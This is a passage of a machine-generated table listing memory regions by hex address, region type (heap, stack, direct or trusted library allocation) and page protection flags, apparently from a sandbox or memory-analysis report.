page read and write
|
||
2D8F6780000
|
direct allocation
|
page read and write
|
||
19CBBDBE000
|
heap
|
page read and write
|
||
7FFD9AEE4000
|
trusted library allocation
|
page read and write
|
||
181AD8E0000
|
direct allocation
|
page read and write
|
||
2D8F6487000
|
heap
|
page read and write
|
||
2D8F64C1000
|
heap
|
page read and write
|
||
286A50C0000
|
heap
|
page read and write
|
||
EC7000
|
heap
|
page read and write
|
||
7FFD9AF30000
|
trusted library allocation
|
page read and write
|
||
A7A518E000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
282B62B1000
|
heap
|
page read and write
|
||
2D8F647C000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
E80000
|
trusted library allocation
|
page read and write
|
||
2D8F6680000
|
direct allocation
|
page read and write
|
||
7FFDFAEE0000
|
unkown
|
page readonly
|
||
EA8000
|
heap
|
page read and write
|
||
7FF623F9B000
|
unkown
|
page readonly
|
||
2D199CB8000
|
heap
|
page read and write
|
||
2D8F63DE000
|
heap
|
page read and write
|
||
20DBCB99000
|
heap
|
page read and write
|
||
17A51521000
|
heap
|
page read and write
|
||
23A0FFF7000
|
heap
|
page read and write
|
||
27CC37C0000
|
heap
|
page read and write
|
||
7FFD9AE90000
|
trusted library allocation
|
page read and write
|
||
1F72ED30000
|
heap
|
page read and write
|
||
1316000
|
heap
|
page read and write
|
||
181AD80E000
|
heap
|
page read and write
|
||
2D8F6630000
|
heap
|
page read and write
|
||
2AF86534000
|
heap
|
page read and write
|
||
13DF6C4A000
|
heap
|
page read and write
|
||
2D8F3CAC000
|
heap
|
page read and write
|
||
282B62B1000
|
heap
|
page read and write
|
||
7FFD9ADD6000
|
trusted library allocation
|
page execute and read and write
|
||
1E012B01000
|
trusted library allocation
|
page read and write
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
2D8F5E5D000
|
heap
|
page read and write
|
||
7FFD9B0F0000
|
trusted library allocation
|
page read and write
|
||
1FE983CB000
|
heap
|
page read and write
|
||
1D8A000
|
heap
|
page read and write
|
||
2D8F6A98000
|
direct allocation
|
page read and write
|
||
236FDE90000
|
heap
|
page read and write
|
||
19CBC27E000
|
heap
|
page read and write
|
||
26531898000
|
heap
|
page read and write
|
||
E93000
|
heap
|
page read and write
|
||
266C29B0000
|
heap
|
page read and write
|
||
7FFDFA1C3000
|
unkown
|
page execute and read and write
|
||
2D8F64E7000
|
heap
|
page read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
2D8F6080000
|
heap
|
page read and write
|
||
181AD923000
|
direct allocation
|
page read and write
|
||
F7F5EF000
|
stack
|
page read and write
|
||
21E8EEB8000
|
heap
|
page read and write
|
||
13DF6AE0000
|
heap
|
page read and write
|
||
2197E901000
|
heap
|
page read and write
|
||
7FFDFB771000
|
unkown
|
page execute and read and write
|
||
19DCB030000
|
heap
|
page read and write
|
||
19CBBB10000
|
heap
|
page read and write
|
||
21EE58B7000
|
heap
|
page read and write
|
||
7FFD9AF70000
|
trusted library allocation
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
2D8F64EF000
|
heap
|
page read and write
|
||
1E000AFB000
|
heap
|
page read and write
|
||
2D8F667E000
|
heap
|
page read and write
|
||
34427FE000
|
unkown
|
page read and write
|
||
21E8EE60000
|
heap
|
page read and write
|
||
235B31C9000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B050000
|
trusted library allocation
|
page read and write
|
||
2D8F667D000
|
heap
|
page read and write
|
||
2D8F6B47000
|
heap
|
page read and write
|
||
1690000
|
heap
|
page readonly
|
||
4C2D5FC000
|
stack
|
page read and write
|
||
20CA072A000
|
heap
|
page read and write
|
||
5190000
|
trusted library allocation
|
page read and write
|
||
282B6254000
|
heap
|
page read and write
|
||
21910211000
|
trusted library allocation
|
page read and write
|
||
219186DA000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
2D8F667D000
|
heap
|
page read and write
|
||
2AF862E2000
|
heap
|
page read and write
|
||
2197E0C0000
|
heap
|
page read and write
|
||
4315BE6000
|
stack
|
page read and write
|
||
2D8F64FA000
|
heap
|
page read and write
|
||
2D8F60AF000
|
heap
|
page read and write
|
||
19CBBB63000
|
heap
|
page read and write
|
||
19DCC995000
|
heap
|
page read and write
|
||
2D8F60F7000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
256F2B80000
|
heap
|
page read and write
|
||
2D8F5E5B000
|
heap
|
page read and write
|
||
2D8F658A000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
2D8F3BA0000
|
heap
|
page read and write
|
||
181AD7A6000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1A601872000
|
heap
|
page read and write
|
||
1F72F0A4000
|
heap
|
page read and write
|
||
7FFD9B060000
|
trusted library allocation
|
page read and write
|
||
19DCB06D000
|
heap
|
page read and write
|
||
7FFE148EC000
|
unkown
|
page execute and write copy
|
||
236FDE10000
|
heap
|
page read and write
|
||
63F03FF000
|
unkown
|
page read and write
|
||
28A22061000
|
heap
|
page read and write
|
||
181B0DE9000
|
direct allocation
|
page read and write
|
||
2D8F5E51000
|
heap
|
page read and write
|
||
1A601860000
|
heap
|
page read and write
|
||
256E8AB4000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
181B0D50000
|
direct allocation
|
page read and write
|
||
7FF63426B000
|
unkown
|
page readonly
|
||
19DCB061000
|
heap
|
page read and write
|
||
13DF6C61000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
219018E5000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
1E002F20000
|
trusted library allocation
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
201E0140000
|
heap
|
page read and write
|
||
181AD81A000
|
heap
|
page read and write
|
||
427DCFF000
|
unkown
|
page read and write
|
||
1C0F000
|
stack
|
page read and write
|
||
2D8F6151000
|
heap
|
page read and write
|
||
2D8F6C5C000
|
heap
|
page read and write
|
||
21900408000
|
trusted library allocation
|
page read and write
|
||
2D8F6281000
|
heap
|
page read and write
|
||
2AF862A0000
|
heap
|
page read and write
|
||
286A5270000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
181AD7D9000
|
heap
|
page read and write
|
||
7FFE11510000
|
unkown
|
page readonly
|
||
21645CF0000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
17A51517000
|
heap
|
page read and write
|
||
2625EB08000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
5142000
|
trusted library allocation
|
page read and write
|
||
1E01AB00000
|
heap
|
page read and write
|
||
AA5AE7E000
|
stack
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FFDFB03D000
|
unkown
|
page execute and read and write
|
||
20DBCBA2000
|
heap
|
page read and write
|
||
20DBCD70000
|
heap
|
page read and write
|
||
2D8F632E000
|
heap
|
page read and write
|
||
2D8F63EF000
|
heap
|
page read and write
|
||
14000A000
|
unkown
|
page readonly
|
||
2E4A9A74000
|
heap
|
page read and write
|
||
314C000
|
stack
|
page read and write
|
||
19CBBDB4000
|
heap
|
page read and write
|
||
2D8F6626000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
E30000
|
trusted library allocation
|
page read and write
|
||
7FFD9AFE0000
|
trusted library allocation
|
page read and write
|
||
2D8F64D5000
|
heap
|
page read and write
|
||
2D8F64D8000
|
heap
|
page read and write
|
||
5180000
|
trusted library allocation
|
page read and write
|
||
290CDFF000
|
unkown
|
page read and write
|
||
2AF86280000
|
heap
|
page read and write
|
||
1F52ECF0000
|
heap
|
page read and write
|
||
2D8F6638000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C54000
|
heap
|
page read and write
|
||
2E4A9A20000
|
heap
|
page read and write
|
||
2D8F63F8000
|
heap
|
page read and write
|
||
2D8F6D64000
|
heap
|
page read and write
|
||
181AD7B3000
|
heap
|
page read and write
|
||
2D8F3C5B000
|
heap
|
page read and write
|
||
7FFDFAF84000
|
unkown
|
page execute and read and write
|
||
5550000
|
heap
|
page read and write
|
||
1E00455C000
|
trusted library allocation
|
page read and write
|
||
1E000C00000
|
trusted library allocation
|
page read and write
|
||
2D8F60B5000
|
heap
|
page read and write
|
||
7FFE0145E000
|
unkown
|
page execute and read and write
|
||
2D8F6AA8000
|
direct allocation
|
page read and write
|
||
2D8F5DDD000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFE126FB000
|
unkown
|
page read and write
|
||
21E8EE80000
|
heap
|
page read and write
|
||
2D8F6350000
|
heap
|
page read and write
|
||
7FFE1023E000
|
unkown
|
page execute and read and write
|
||
BAA453D000
|
stack
|
page read and write
|
||
E33000
|
trusted library allocation
|
page execute and read and write
|
||
B532537000
|
stack
|
page read and write
|
||
19CBBB80000
|
heap
|
page read and write
|
||
7FFDFB2C8000
|
unkown
|
page execute and read and write
|
||
2D8F6496000
|
heap
|
page read and write
|
||
2D8F5A40000
|
direct allocation
|
page read and write
|
||
13DF6C61000
|
heap
|
page read and write
|
||
23D52B58000
|
heap
|
page read and write
|
||
7FF623FAE000
|
unkown
|
page write copy
|
||
CDAD57E000
|
stack
|
page read and write
|
||
1DC711E4000
|
heap
|
page read and write
|
||
19CBBDE0000
|
heap
|
page read and write
|
||
19CBBDB5000
|
heap
|
page read and write
|
||
2D8F64BE000
|
heap
|
page read and write
|
||
1D92068A000
|
heap
|
page read and write
|
||
219188FE000
|
heap
|
page read and write
|
||
181AD760000
|
heap
|
page read and write
|
||
7FFDFB778000
|
unkown
|
page read and write
|
||
23D52B5B000
|
heap
|
page read and write
|
||
236FDE96000
|
heap
|
page read and write
|
||
7FFD9ADA6000
|
trusted library allocation
|
page read and write
|
||
2D8F64A5000
|
heap
|
page read and write
|
||
2D199C10000
|
heap
|
page read and write
|
||
1C34C450000
|
unkown
|
page read and write
|
||
2ECE000
|
stack
|
page read and write
|
||
2D8F6466000
|
heap
|
page read and write
|
||
21645AAD000
|
heap
|
page read and write
|
||
2D8F659F000
|
heap
|
page read and write
|
||
2D8F661B000
|
heap
|
page read and write
|
||
2D8F6440000
|
heap
|
page read and write
|
||
2D8F6301000
|
heap
|
page read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
280B55D0000
|
heap
|
page read and write
|
||
4C2D57F000
|
stack
|
page read and write
|
||
21E8EEA6000
|
heap
|
page read and write
|
||
7FF771DB0000
|
unkown
|
page readonly
|
||
19CBC2A2000
|
heap
|
page read and write
|
||
19CBBB63000
|
heap
|
page read and write
|
||
7FF633FEC000
|
unkown
|
page read and write
|
||
2D8F6634000
|
heap
|
page read and write
|
||
13DF6BE0000
|
heap
|
page read and write
|
||
256E8AB0000
|
heap
|
page read and write
|
||
19DCB040000
|
heap
|
page read and write
|
||
278961F9000
|
heap
|
page read and write
|
||
2D8F5E6C000
|
heap
|
page read and write
|
||
1C34C430000
|
heap
|
page read and write
|
||
2AF862C0000
|
heap
|
page read and write
|
||
2197E7E0000
|
heap
|
page read and write
|
||
2D8F6678000
|
heap
|
page read and write
|
||
83D6FFF000
|
unkown
|
page read and write
|
||
2625EB10000
|
heap
|
page read and write
|
||
7FFE0EB5E000
|
unkown
|
page execute and read and write
|
||
7FFE13300000
|
unkown
|
page readonly
|
||
12F8000
|
heap
|
page read and write
|
||
77BF0FE000
|
stack
|
page read and write
|
||
20DBCB9E000
|
heap
|
page read and write
|
||
48C5DCD000
|
stack
|
page read and write
|
||
2D8F63DA000
|
heap
|
page read and write
|
||
19CBDB42000
|
heap
|
page read and write
|
||
19CBBB64000
|
heap
|
page read and write
|
||
1D82000
|
heap
|
page read and write
|
||
5F65CFE000
|
stack
|
page read and write
|
||
20CA0720000
|
heap
|
page read and write
|
||
2D8F5E5D000
|
heap
|
page read and write
|
||
7FF623FB4000
|
unkown
|
page readonly
|
||
1A601869000
|
heap
|
page read and write
|
||
7FFE10268000
|
unkown
|
page read and write
|
||
512934F000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFDFAF54000
|
unkown
|
page execute and read and write
|
||
E34000
|
trusted library allocation
|
page read and write
|
||
236FE200000
|
heap
|
page read and write
|
||
2D8F64B4000
|
heap
|
page read and write
|
||
282ACF74000
|
heap
|
page read and write
|
||
1F52F090000
|
heap
|
page read and write
|
||
2D8F64C2000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2E4A9A81000
|
heap
|
page read and write
|
||
256F2BB0000
|
heap
|
page read and write
|
||
63F02FC000
|
stack
|
page read and write
|
||
2D8F5D9D000
|
heap
|
page read and write
|
||
256E8B29000
|
heap
|
page read and write
|
||
19CBC299000
|
heap
|
page read and write
|
||
19CBBDBA000
|
heap
|
page read and write
|
||
2D8F667D000
|
heap
|
page read and write
|
||
181B0CE0000
|
direct allocation
|
page read and write
|
||
19CBBB78000
|
heap
|
page read and write
|
||
7FFE126F9000
|
unkown
|
page execute and write copy
|
||
2D8F6357000
|
heap
|
page read and write
|
||
2197E800000
|
heap
|
page read and write
|
||
21E8ED60000
|
heap
|
page read and write
|
||
4C2D4FF000
|
stack
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
7FFE148EB000
|
unkown
|
page execute and read and write
|
||
D90000
|
heap
|
page read and write
|
||
8400000
|
direct allocation
|
page read and write
|
||
282ACF40000
|
heap
|
page read and write
|
||
7FFD9AEA0000
|
trusted library allocation
|
page read and write
|
||
2D8F637E000
|
heap
|
page read and write
|
||
263BF120000
|
heap
|
page read and write
|
||
2D8F646C000
|
heap
|
page read and write
|
||
2D199CA0000
|
heap
|
page read and write
|
||
AF3887E000
|
stack
|
page read and write
|
||
7FF771DB0000
|
unkown
|
page readonly
|
||
19CBC29A000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
23A0FFF0000
|
heap
|
page read and write
|
||
2D8F5E41000
|
heap
|
page read and write
|
||
2D8F6AAC000
|
direct allocation
|
page read and write
|
||
3039CFF000
|
unkown
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
1E0047BC000
|
trusted library allocation
|
page read and write
|
||
2D8F5DA0000
|
heap
|
page read and write
|
||
27CC3740000
|
heap
|
page read and write
|
||
19CBBDA0000
|
heap
|
page read and write
|
||
181AD7A0000
|
heap
|
page read and write
|
||
19CBDB44000
|
heap
|
page read and write
|
||
19CBBD30000
|
trusted library allocation
|
page read and write
|
||
181AD803000
|
heap
|
page read and write
|
||
AAA77FF000
|
stack
|
page read and write
|
||
2197E901000
|
heap
|
page read and write
|
||
3D2EFFF000
|
unkown
|
page read and write
|
||
21E8F054000
|
heap
|
page read and write
|
||
7D9FBF5000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
27CC37B8000
|
heap
|
page read and write
|
||
7FFD9B049000
|
trusted library allocation
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
17A51521000
|
heap
|
page read and write
|
||
F025FDC000
|
stack
|
page read and write
|
||
7FFD9AD0B000
|
trusted library allocation
|
page read and write
|
||
2D8F6093000
|
heap
|
page read and write
|
||
2D8F64A6000
|
heap
|
page read and write
|
||
5210000
|
trusted library allocation
|
page read and write
|
||
2D8F3C5E000
|
heap
|
page read and write
|
||
2D8F64D1000
|
heap
|
page read and write
|
||
20DBCBC2000
|
heap
|
page read and write
|
||
21918A11000
|
heap
|
page read and write
|
||
2197E18A000
|
heap
|
page read and write
|
||
2D8F649E000
|
heap
|
page read and write
|
||
2D8F646F000
|
heap
|
page read and write
|
||
181B0CC0000
|
direct allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
219104CE000
|
trusted library allocation
|
page read and write
|
||
256E8B1A000
|
heap
|
page read and write
|
||
2E4A9A81000
|
heap
|
page read and write
|
||
7FFD9B050000
|
trusted library allocation
|
page read and write
|
||
2D8F60B5000
|
heap
|
page read and write
|
||
7FFDFB24D000
|
unkown
|
page execute and read and write
|
||
2D8F6352000
|
heap
|
page read and write
|
||
5156000
|
trusted library allocation
|
page read and write
|
||
2D8F6483000
|
heap
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
21014FB0000
|
heap
|
page read and write
|
||
5120000
|
trusted library allocation
|
page read and write
|
||
256E8CE0000
|
heap
|
page read and write
|
||
278961F0000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
FD8F5FE000
|
stack
|
page read and write
|
||
28A2204B000
|
heap
|
page read and write
|
||
2197E186000
|
heap
|
page read and write
|
||
2D8F3CA5000
|
heap
|
page read and write
|
||
2D8F6666000
|
heap
|
page read and write
|
||
19CBC284000
|
heap
|
page read and write
|
||
7FFDFB2F2000
|
unkown
|
page execute and read and write
|
||
2D8F72DC000
|
direct allocation
|
page read and write
|
||
2D8F6460000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
21447470000
|
heap
|
page read and write
|
||
2E4A9A75000
|
heap
|
page read and write
|
||
2D8F667B000
|
heap
|
page read and write
|
||
181B0BA0000
|
direct allocation
|
page read and write
|
||
7FFE11526000
|
unkown
|
page execute and write copy
|
||
1DC711E0000
|
heap
|
page read and write
|
||
2D199F34000
|
heap
|
page read and write
|
||
F083A9C000
|
stack
|
page read and write
|
||
FD8F67F000
|
stack
|
page read and write
|
||
20DBCB93000
|
heap
|
page read and write
|
||
EAE25CE000
|
stack
|
page read and write
|
||
7FF633FEA000
|
unkown
|
page readonly
|
||
21E8F050000
|
heap
|
page read and write
|
||
21918A61000
|
heap
|
page read and write
|
||
7FFE126F8000
|
unkown
|
page execute and read and write
|
||
F0262FE000
|
unkown
|
page read and write
|
||
1291000
|
heap
|
page read and write
|
||
2D8F6482000
|
heap
|
page read and write
|
||
181AD81E000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2FCF000
|
stack
|
page read and write
|
||
1C378808000
|
heap
|
page read and write
|
||
21645ABA000
|
heap
|
page read and write
|
||
282ACFC1000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1E000AF9000
|
heap
|
page read and write
|
||
2AF862E0000
|
heap
|
page read and write
|
||
2D8F663E000
|
heap
|
page read and write
|
||
2D8F3C3E000
|
heap
|
page read and write
|
||
4C2D97E000
|
stack
|
page read and write
|
||
2D8F662B000
|
heap
|
page read and write
|
||
1E0039D7000
|
trusted library allocation
|
page read and write
|
||
7FFDFB6F9000
|
unkown
|
page execute and read and write
|
||
12100000
|
trusted library allocation
|
page read and write
|
||
167E8030000
|
heap
|
page read and write
|
||
24EF2B05000
|
heap
|
page read and write
|
||
2C0E000
|
stack
|
page read and write
|
||
B5324BE000
|
stack
|
page read and write
|
||
2070D481000
|
heap
|
page read and write
|
||
19F0DAF000
|
stack
|
page read and write
|
||
7FFE13341000
|
unkown
|
page readonly
|
||
1E01B030000
|
heap
|
page read and write
|
||
1DC70E51000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
2D8F658A000
|
heap
|
page read and write
|
||
2D8F6118000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
2D8F3C2F000
|
heap
|
page read and write
|
||
324C000
|
stack
|
page read and write
|
||
7FFD9B000000
|
trusted library allocation
|
page read and write
|
||
2D8F5DE0000
|
heap
|
page read and write
|
||
1C378A35000
|
heap
|
page read and write
|
||
215A32A5000
|
heap
|
page read and write
|
||
1239000
|
heap
|
page read and write
|
||
181B0DED000
|
direct allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1327000
|
heap
|
page read and write
|
||
21901A71000
|
trusted library allocation
|
page read and write
|
||
2D8F6440000
|
heap
|
page read and write
|
||
256F2C3D000
|
heap
|
page read and write
|
||
7FFD9AFA0000
|
trusted library allocation
|
page read and write
|
||
1FE0000
|
direct allocation
|
page execute and read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
7FFE13323000
|
unkown
|
page read and write
|
||
2D8F63F3000
|
heap
|
page read and write
|
||
1E000B70000
|
heap
|
page read and write
|
||
DE697CB000
|
stack
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
280B56E4000
|
heap
|
page read and write
|
||
181AD927000
|
direct allocation
|
page read and write
|
||
2D8F6381000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
215A34B0000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
1B091990000
|
heap
|
page read and write
|
||
7FFDFAF56000
|
unkown
|
page execute and read and write
|
||
1FD0000
|
direct allocation
|
page execute and read and write
|
||
4C2E54E000
|
stack
|
page read and write
|
||
2D8F6487000
|
heap
|
page read and write
|
||
24EF2A10000
|
heap
|
page read and write
|
||
E448B7F000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1E000ABD000
|
heap
|
page read and write
|
||
1F72ED51000
|
heap
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
219187CA000
|
heap
|
page read and write
|
||
29532800000
|
heap
|
page read and write
|
||
F0E9DD8000
|
stack
|
page read and write
|
||
2D8F6281000
|
heap
|
page read and write
|
||
3D2F0FF000
|
stack
|
page read and write
|
||
2D8F5DF5000
|
heap
|
page read and write
|
||
7FFD9AEC0000
|
trusted library allocation
|
page execute and read and write
|
||
265319A0000
|
heap
|
page read and write
|
||
CD6AD7E000
|
stack
|
page read and write
|
||
A7A54FF000
|
stack
|
page read and write
|
||
2D8F5DE3000
|
heap
|
page read and write
|
||
2D8F64F1000
|
heap
|
page read and write
|
||
1A49C388000
|
heap
|
page read and write
|
||
2D8F64B4000
|
heap
|
page read and write
|
||
1DC70E51000
|
heap
|
page read and write
|
||
7FFD9B044000
|
trusted library allocation
|
page read and write
|
||
2197E090000
|
heap
|
page read and write
|
||
21918A41000
|
heap
|
page read and write
|
||
140009000
|
unkown
|
page read and write
|
||
B98FFFF000
|
stack
|
page read and write
|
||
2D8F6380000
|
heap
|
page read and write
|
||
7FF77203E000
|
unkown
|
page readonly
|
||
282ACFC1000
|
heap
|
page read and write
|
||
2D8F6301000
|
heap
|
page read and write
|
||
20CA0741000
|
heap
|
page read and write
|
||
19F11FE000
|
stack
|
page read and write
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
7FFD9AF10000
|
trusted library allocation
|
page read and write
|
||
1D920680000
|
heap
|
page read and write
|
||
F54000
|
heap
|
page read and write
|
||
2D8F6440000
|
heap
|
page read and write
|
||
7FFD9AF10000
|
trusted library allocation
|
page read and write
|
||
7FFD9AF50000
|
trusted library allocation
|
page read and write
|
||
7FFE126EB000
|
unkown
|
page execute and read and write
|
||
2D8F64C2000
|
heap
|
page read and write
|
||
19CBBB71000
|
heap
|
page read and write
|
||
B53217F000
|
stack
|
page read and write
|
||
7FFD9AF20000
|
trusted library allocation
|
page read and write
|
||
265318A1000
|
heap
|
page read and write
|
||
2D8F662B000
|
heap
|
page read and write
|
||
7FFD9AF60000
|
trusted library allocation
|
page read and write
|
||
23DAA274000
|
heap
|
page read and write
|
||
63F04FF000
|
stack
|
page read and write
|
||
2D8F6658000
|
heap
|
page read and write
|
||
21EE57E0000
|
heap
|
page read and write
|
||
7FFE13317000
|
unkown
|
page execute and read and write
|
||
E5A000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F55F0000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
27CC37C0000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
5530000
|
trusted library allocation
|
page execute and read and write
|
||
235B34A4000
|
heap
|
page read and write
|
||
1C8E000
|
stack
|
page read and write
|
||
215A32D4000
|
heap
|
page read and write
|
||
2D8F6B47000
|
heap
|
page read and write
|
||
219187D3000
|
heap
|
page read and write
|
||
34426FC000
|
stack
|
page read and write
|
||
282ACFBB000
|
heap
|
page read and write
|
||
1E000ABF000
|
heap
|
page read and write
|
||
1FE983C0000
|
heap
|
page read and write
|
||
1E000C70000
|
heap
|
page read and write
|
||
7FFD9AD1B000
|
trusted library allocation
|
page read and write
|
||
21447500000
|
heap
|
page read and write
|
||
102FFF000
|
stack
|
page read and write
|
||
295326D0000
|
heap
|
page read and write
|
||
20DBCBCC000
|
heap
|
page read and write
|
||
1DC70E30000
|
heap
|
page read and write
|
||
7FFE12E1A000
|
unkown
|
page execute and write copy
|
||
7FF633FE1000
|
unkown
|
page execute read
|
||
7FFDFB2F6000
|
unkown
|
page execute and write copy
|
||
196D898A000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F5DE5000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
7FFD9AEAA000
|
trusted library allocation
|
page read and write
|
||
2D8F64B0000
|
heap
|
page read and write
|
||
278963A4000
|
heap
|
page read and write
|
||
7FF771DB1000
|
unkown
|
page execute read
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C82000
|
heap
|
page read and write
|
||
13DF6C61000
|
heap
|
page read and write
|
||
7FFD9B030000
|
trusted library allocation
|
page read and write
|
||
19CBBDBA000
|
heap
|
page read and write
|
||
51292CC000
|
stack
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
1218000
|
trusted library allocation
|
page read and write
|
||
2D8F631D000
|
heap
|
page read and write
|
||
1E002B01000
|
trusted library allocation
|
page read and write
|
||
2E4A9A7B000
|
heap
|
page read and write
|
||
2D8F5DF5000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
196D88F0000
|
heap
|
page read and write
|
||
26531AF4000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
2197E182000
|
heap
|
page read and write
|
||
B89C7CC000
|
stack
|
page read and write
|
||
215A32AB000
|
heap
|
page read and write
|
||
19CBBDB3000
|
heap
|
page read and write
|
||
282B61E0000
|
heap
|
page read and write
|
||
2D8F64B8000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
29532804000
|
heap
|
page read and write
|
||
181AD7A3000
|
heap
|
page read and write
|
||
A7A508D000
|
stack
|
page read and write
|
||
DE69BFF000
|
stack
|
page read and write
|
||
7FFD9B140000
|
trusted library allocation
|
page read and write
|
||
196D8810000
|
heap
|
page read and write
|
||
6600000
|
direct allocation
|
page read and write
|
||
1C34C655000
|
heap
|
page read and write
|
||
3D2EEFC000
|
stack
|
page read and write
|
||
E1E000
|
stack
|
page read and write
|
||
19CBC288000
|
heap
|
page read and write
|
||
7FF623F71000
|
unkown
|
page execute read
|
||
7A6D8FF000
|
unkown
|
page read and write
|
||
140001000
|
unkown
|
page execute read
|
||
24310B80000
|
heap
|
page read and write
|
||
16B5000
|
heap
|
page read and write
|
||
1200000
|
heap
|
page read and write
|
||
2D8F64EF000
|
heap
|
page read and write
|
||
2D8F3C5B000
|
heap
|
page read and write
|
||
85448FF000
|
unkown
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
116E000
|
stack
|
page read and write
|
||
51F0000
|
heap
|
page execute and read and write
|
||
2953250A000
|
heap
|
page read and write
|
||
2D8F63A3000
|
heap
|
page read and write
|
||
219001C7000
|
heap
|
page execute and read and write
|
||
2A62F6B0000
|
heap
|
page read and write
|
||
2D8F63AE000
|
heap
|
page read and write
|
||
24EF2810000
|
heap
|
page read and write
|
||
181AD7CA000
|
heap
|
page read and write
|
||
2070D3D0000
|
heap
|
page read and write
|
||
29532810000
|
heap
|
page read and write
|
||
2D8F6621000
|
heap
|
page read and write
|
||
1302000
|
heap
|
page read and write
|
||
219104EC000
|
trusted library allocation
|
page read and write
|
||
263BF240000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFE10314000
|
unkown
|
page execute and read and write
|
||
19DCAF70000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9ADC0000
|
trusted library allocation
|
page execute and read and write
|
||
19CBBB8F000
|
heap
|
page read and write
|
||
1B091D85000
|
heap
|
page read and write
|
||
7FFD9ACF0000
|
trusted library allocation
|
page read and write
|
||
5EC0000
|
trusted library allocation
|
page execute and read and write
|
||
2197E3C4000
|
heap
|
page read and write
|
||
219010A5000
|
trusted library allocation
|
page read and write
|
||
19DCB06D000
|
heap
|
page read and write
|
||
20DBCB70000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
F083B1F000
|
stack
|
page read and write
|
||
19CBBB75000
|
heap
|
page read and write
|
||
5134000
|
trusted library allocation
|
page read and write
|
||
4DCE000
|
stack
|
page read and write
|
||
2D8F63F6000
|
heap
|
page read and write
|
||
B3C2DFF000
|
stack
|
page read and write
|
||
2E4A9A8A000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
5F6594B000
|
stack
|
page read and write
|
||
7FFD9AF70000
|
trusted library allocation
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
21645AC7000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
